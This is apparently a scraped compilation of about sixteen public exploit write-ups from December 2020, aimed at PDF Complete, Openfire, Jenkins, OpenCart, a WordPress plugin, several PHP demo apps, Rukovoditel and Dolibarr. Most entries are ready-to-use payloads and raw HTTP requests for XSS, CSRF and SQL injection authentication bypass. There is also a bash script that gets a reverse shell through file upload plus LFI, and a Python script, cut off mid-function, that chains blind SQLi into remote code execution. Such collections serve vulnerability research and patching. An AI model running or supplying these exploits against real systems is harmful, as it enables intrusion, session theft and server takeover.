ISHACK AI BOT

# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path # Discovery by: Zaira Alquicira # Discovery Date: 2020-12-10 # Vendor Homepage: https://pdf-complete.informer.com/3.5/ # Tested Version: 3.5.310.2002 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v """ PDF Complete PDF Complete C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto # Service info: C:\Users\TOSHIBA>sc qc "pdfcDispatcher" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: pdfcDispatcher TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PDF Document Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting # Date: 10/12/2020 # Exploit Author: Nikhil Kumar # Vendor Homepage: http://egavilanmedia.com/ # Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/ # Version: 1.0 # Tested On: Ubuntu 1. Open the index.php page using following url http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php click on the New Barcode 2. Intercept the request through burp suite Put a payload on "name=" parameter Payload :- abc"><script>alert("XSS")</script> Malicious Request:: POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 6 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php Upgrade-Insecure-Requests: 1 name=abc"><script>alert("XSS")</script>

# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery # Date: 12-11-2020 # Exploit Author: Mahendra Purbia {Mah3Sec} # Vendor Homepage: https://www.opencart.com # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: OpenCart CMS - 3.0.3.6 # Tested on: Kali Linux #Description: This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart. #Additional Information: well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability. Attack Vector: 1. create two accounts A(attacker) & B(victim) 2. login with A and add a product in cart and capture that particular request in burpsuite. 3. Now change the quantity if want and then create a csrf poc of that request. 4. Save it as .html and send it to victim. Now the product added to victims cart. #POC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST"> <input type="hidden" name="product&#95;id" value="43" /> <input type="hidden" name="quantity" value="10000000" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS # Date: 20201209 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/nodejs/nodejs.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 60 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819 Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save payload："><ScRiPt>alert(document.cookie)</ScRiPt>

# Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2229 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons. Tooltip values can be contributed by plugins, some of which use user-specified values. This results in a stored cross-site scripting (XSS) vulnerability. Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons. Technical Details and Exploitation: As it is possible to observe from patch commit: https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6 The fix to solve the vulnerability is applied to 'core/src/main/resources/lib/layout/svgIcon.jelly' tooltip attribute: <svg class="svg-icon ${attrs.class}" viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}" focusable="${attrs.focusable != null ? attrs.focusable : 'false'}" aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}" style="${attrs.style}" onclick="${attrs.onclick}" tooltip="${h.xmlEscape(attrs.tooltip ?: '')}"> svgIcon is a layout element belonging to jenkins core: https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon As suggested by Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/) "Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations don’t result in surprising behavior." Tooltip attribute can contain HTML code, as suggested in form section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/ For this reason, it is possible to inject XSS code in a Jenkins system by uploading a plugin that contains an <j:svgIcon> element containing a malicious XSS payload in tooltip attribute: <l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon> To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ . To obtain information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins Proof Of Concept: 1. Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element. 2. Generate a plugin. For example, you can create a class that implements ModelObjectWithContextMenu interface to create a context menu and implement the method getUrlName() containing a <plugin-url> string that you can navigate by using the link: http(s)://<jenkins_server>/<plugin-url> 3. In jelly file, insert the following element: <l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon> This creates an icon that triggers the Cross-Site Scripting when the mouse is over and opens tooltip. Obviously, you can use css and large size and height to generate a svg element that covers all the screen in order to trigger the XSS when the user navigates the page. Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4

# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection # Date: 2020-12-09 # Exploit Author: Manish Solanki # Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code # Version: 2.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: admin page #Exploit Open the Application check the URL: http://localhost/eb_magalona_lms Open Admin Login Enter username: a' or 1=1-- Enter password: ' click on login The SQL payload gets executed and authorization is bypassed successfully

# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting # Date: 11/27/2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: https://sygnoos.com # Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/ # Version: <= 3.69.6 # Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter Plugin is vulnerable to stored cross site scripting. There are multiple parameters vulnerable to cross site scripting. All versions up to 3.69.6 are vulnerable to stored cross site scripting. More information about this plugin could be found on the following links: 1. https://wordpress.org/plugins/popup-builder/ 2. https://popup-builder.com/ Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. A successful cross site scripting attack can have devastating consequences for an online business’s reputation and its relationship with its clients. Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. # How to reproduce # 1. Login as Editor or Administrator: https://website.com/wp-login/ 2. Go to the following link: https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for PopUp Builder and select or create new PopUp. 2. Click edit 3. Search and find: # Custom JS or CSS 4. On JS -> Opening events section, add two payloads, one for #2 section and one for #3 section, like in the following example: #2 Add the code you want to run before the popup opens. This will be the code that will work in the process of opening the popup. true/false conditions will not work in this phase. <textarea class="wp-editor-area editor-content" data-attr-event="WillOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-WillOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea> #3 Add the code you want to run after the popup opens. This code will work when the popup is already open on the page. <textarea class="wp-editor-area editor-content" data-attr-event="DidOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-DidOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea> 5. Click Update 6. Go to https://website.com. The XSS alert will pop up. # All text-areas from JS section are vulnerable to stored cross site scripting. Evidence: 1. https://ibb.co/JvBTq0H 2. https://ibb.co/0KP7NFQ 3. https://ibb.co/3cFnVYF

# Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS # Date: 2020/12/11 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 144 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users= Vulnerable parameters：groupchatJID payload："><ScRiPt>alert(document.cookie)</ScRiPt>

# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS # Date: 2020/12/11 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 144 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E Vulnerable parameters：users payload："><ScRiPt>alert(document.cookie)</ScRiPt>

# Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS # Date: 20201211 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/dbaccess/db-access.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819 Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E Vulnerable parameters：sql payload："><ScRiPt>alert(document.cookie)</ScRiPt>

# Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on "Medical Products", select "Add Medical Products", use "<scrip>alert(1)</script>" in both name ad description fields. Complete the other fields and save product. Step 3: Once you click on save, this should trigger the XSS payload. clicking on the "Medical Products" page anytime will trigger the Stored XSS Payload Note: Same method applies to "Add New Hospital | Pharmacy page" Step 1: Use "<scrip>alert("r0b0tG4nG")</script>" as hospital/pharmacy name, fill the other required information and click on save. Your payload will be executed anytime you click on "Medical Products" page or "Add New Hospital | Pharmacy page" page.

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection # Date: 2020-12-11 # Exploit Author: Piyush Malviya # Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code # Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4 #Vulnerable Page: Login Page #Exploit Open the Application check the URL: http://localhost/scm-master/ Open Login Page Enter username: ' or 0=0 # Enter password: ' Select Login Type: Admin click on login The SQL payload gets executed and authentication is bypassed successfully

# Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2230 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission. Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description. Technical Details and Exploitation: As it is possible to observe from patch commit: https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2 The fix to solve the vulnerability is applied in activateValidationMessage function to 'war/src/main/js/add-item.js' javascript file: function activateValidationMessage(messageId, context, message) { ... $(messageId, context).html('&#187; ' + message); // AFTER FIX: $(messageId, context).text('» ' + message); ... } The function is called during the creation of a new Item, on "blur input" event (when text element of name input is focused): $('input[name="name"]', '#createItem').on("blur input", function() { if (!isItemNameEmpty()) { var itemName = $('input[name="name"]', '#createItem').val(); $.get("checkJobName", { value: itemName }).done(function(data) { var message = parseResponseFromCheckJobName(data); if (message !== '') { activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE } else { cleanValidationMessages('.add-item-name'); showInputHelp('.add-item-name'); setFieldValidationStatus('name', true); if (getFormValidationStatus()) { enableSubmit(true); } } }); } else { .... activateValidationMessage('#itemname-required', '.add-item-name'); } }); as "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with validation rules, an error is triggered. Error message is not escaped for vulnerable versions, so it is vulnerable to XSS. Validation rules can trigger an error in several ways, for example: - if the current item name is equal to an already existent item name; - if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, a error message is shown. In the first case Jenkins seems to be protected because when a new project is created, it is not possible to insert malicious characters (such as <,>). In the second case, the error message also shows a description, that can be provided by the user during the regex strategy creation. In description field, it is possible to inject malicious characters, so it is possible to insert an XSS payload in description field. When the user insert a name that is not compliant with project naming strategy, the XSS is triggered. Proof Of Concept: 1. In <jenkins_url>/configure create a new Project Naming Strategy (enable checkbox "Restrict project naming") containing the following values: Pattern: ^TEST.* Description: GX1h4ck <img src=a onerror=alert(1)> 2. Go to New element creation section (/<jenkins_url>/jenkins/view/all/newJob). When you insert a character in the name field, alert is triggered. Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4

# Exploit Title: Rukovoditel 2.6.1 - RCE # Date: 2020-06-11 # Exploit Author: coiffeur # Write Up: https://therealcoiffeur.github.io/c1010 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # CVE: CVE-2020-11819 set -e function usage () { echo "NAME: Rukovoditel v2.6.1, RCE" echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>" echo "DESCRIPTION:" echo "Upload file test.php on the remote server and trigger the file using a LFI" echo "AUTHOR: coiffeur" exit } if [ "$#" -ne 2 ]; then usage fi BASE_URL=$1 SID=$2 echo "Setting target: $BASE_URL" echo "Setting sid: $SID" echo "" echo "Extracting \$app_user['id']:" APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1` echo " => \$app_user['id']: $APP_USER_ID" echo "Setting arbitrary \$_POST['timestamp']:" TIMESTAMP=1337 echo " => \$_POST['timestamp']: 1337" echo "Calculating \$verifyToken:" VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=` echo " => \$verifyToken: $VERIFY_TOKEN" echo "" echo "[*] Trying to upload test.php ... (Arbitrary File Upload)" curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F '[email protected]' echo "" echo "[*] Trying to recover time() output:" TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s) echo " => timestamp: $TIME" echo "[*] Trying to recover the generated filename:"=20 FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1` echo " => filename: $FILENAME" echo "[*] Trying to reconstructing full path:" DATE=`date +"%Y/%m/%d"` FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"` echo " => full path: $FULL_PATH" echo "" echo "[!] Prepare a netcat listener by typing: nc -lvp 4444" echo "" echo "[*] Trying to update language settings ... (Local File Inclusion)" LANGUAGE="../../$FULL_PATH" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE" echo "[*] Triggering reverse shell ..." curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID=" echo "[*] Restoring default language settings" curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php" echo "> Done"

# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch Step 4. Fill the form , click on save Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: MULTIPART street ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="id" -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="street" 11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="city" 111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="state" 1111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="zip_code" 11111111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="country" 1111111111111 -----------------------------12317926718649295872939507245 Content-Disposition: form-data; name="contact" 111111111 -----------------------------12317926718649295872939507245-- ---

# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE # Date: 2/12/2020 # Exploit Author: coiffeur # Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011 # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/ # Version: 12.0.3 import argparse import binascii import random import re from io import BytesIO from urllib.parse import quote_plus as qp import bcrypt import pytesseract import requests from bs4 import BeautifulSoup from PIL import Image DELTA = None DEBUG = 1 SESSION = requests.session() TRESHOLD = 0.80 DELAY = 1 LIKE = "%_subscription" COLUMNS = ["login", "pass_temp"] def usage(): banner = """NAME: Dolibarr SQLi to RCE (authenticate) SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS= SWORD> EXAMPLE: python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12= .0.3/htdocs/" -u test -p test AUTHOR: coiffeur """ print(banner) exit(-1) def hex(text): return "0x" + binascii.hexlify(text.encode()).decode() def hash(password): salt = bcrypt.gensalt() hashed = bcrypt.hashpw(password.encode(), salt) return hashed.decode() def authenticate(url, username, password): datas = { "actionlogin": "login", "loginfunction": "loginfunction", "username": username, "password": password } r = SESSION.post(f"{url}index.php", data=datas, allow_redirects=False, verify=False) if r.status_code != 302: if DEBUG: print(f"[x] Authentication failed!") return 0 if DEBUG: print(f" [*] Authenticated as: {username}") return 1 def get_antispam_code(base_url): code = "" while len(code) != 5: r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False) temp_image = f"/tmp/{random.randint(0000,9999)}" with open(temp_image, "wb") as f: f.write(r.content) with open(temp_image, "rb") as f: code = pytesseract.image_to_string( Image.open(BytesIO(f.read()))).split("\n")[0] for char in code: if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679": code = "" break return code def reset_password(url, login): for _ in range(5): code = get_antispam_code(url) headers = { "Referer": f"{url}user/passwordforgotten.php" } datas = { "action": "buildnewpassword", "username": login, "code": code } r = SESSION.post(url=f"{url}user/passwordforgotten.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in [f"Request to change password for {login} sent = to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]: if r.text.find(response): if DEBUG: print(f" [*] Password reset using code: {code}") return 1 return 0 def change_password(url, login, pass_temp): r = requests.get(url=f"{url}user/passwordforgotten.php?action=val= idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}", allow_redirects=False, verify=False) if r.status_code == 302: if DEBUG: print(f" [*] Password changed: {pass_temp}") return 1 return 0 def change_binary(url, command, parameters): headers = { "Referer": f"{url}admin/security_file.php" } datas = { "action": "updateform", "MAIN_UPLOAD_DOC": "2048", "MAIN_UMASK": "0664", "MAIN_ANTIVIRUS_COMMAND": command, "MAIN_ANTIVIRUS_PARAM": parameters } r = SESSION.post(url=f"{url}admin/security_file.php", data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["Record modified successfully", "Enregistrement mo= difi=C3=A9 avec succ=C3=A8s"]: if response in r.text: if DEBUG: print(f" [*] Binary's path changed") return 1 return 0 def trigger_exploit(url): headers = { "Referer": f"{url}admin/security_file.php" } files = { "userfile[]": open("junk.txt", "rb"), } datas = { "sendit": "Upload" } if DEBUG: print(f" [*] Triggering reverse shell") r = SESSION.post(url=f"{url}admin/security_file.php", files=files, data=datas, headers=headers, verify=False) if r.status_code == 200: for response in ["File(s) uploaded successfully", "The antivirus pr= ogram was not able to validate the file (file might be infected by a virus)= ", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus= n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir= us) !"]: if response in r.text: if DEBUG: print(f" [*] Exploit done") return 1 return 0 def get_version(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall( r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text) if x: version = x[0] if "12.0.3" in version: if DEBUG: print(f" [*] {version} (exploit should work)") return 1 if DEBUG: print(f"[*] Version may not be vulnerable") return 0 def get_privileges(url): r = SESSION.get(f"{url}index.php", verify=False) x = re.findall(r"id=\d", r.text) if x: id = x[0] if DEBUG: print(f" [*] id found: {id}") r = SESSION.get(f"{url}user/perms.php?{id}", verify=False) soup = BeautifulSoup(r.text, 'html.parser') for img in soup.find_all("img"): if img.get("title") in ["Actif", "Active"]: for td in img.parent.parent.find_all("td"): privileges = [ "Consulter les commandes clients", "Read customers = orders"] for privilege in privileges: if privilege in td: if DEBUG: print( f" [*] Check privileges: {privilege}= ") return 1 if DEBUG: print(f"[*] At the sight of the privileges, the exploit may fail") return 0 def check(url, payload): headers = { "Referer": f"{url}commande/stats/index.php?leftmenu=orders" } datas = {"object_status": payload} r = SESSION.post(url=f"{url}commande/stats/index.php", data=datas, headers=headers, verify=False) return r.elapsed.total_seconds() def evaluate_delay(url): global DELTA deltas = [] payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))" for _ in range(4): deltas.append(check(url, payload)) DELTA = sum(deltas)/len(deltas) if DEBUG: print(f" [+] Delta: {DELTA}") def get_tbl_name_len(url): i = 0 while 1: payload = f"IF((SELECT LENGTH(table_name) FROM information_schema= .tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_tbl_name(url, length): tbl_name = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i= nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP= ({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 tbl_name += chr(min) return tbl_name def get_elt_len(url, tbl_name, column_name): i = 0 while 1: payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI= T 1)>{i}, SLEEP(0), SLEEP({DELAY}))" if check(url, payload) >= DELTA*TRESHOLD: return i if i > 100: print(f"[x] Exploit failed") exit(-1) i += 1 def get_elt(url, tbl_name, column_name, length): elt = "" for i in range(1, length+1): min, max = 0, 127-1 while min < max: mid = (max + min) // 2 payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO= M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))" if check(url, payload) >= DELTA*TRESHOLD: max = mid else: min = mid + 1 elt += chr(min) return elt def get_row(url, tbl_name): print(f" [*] Dump admin's infos from 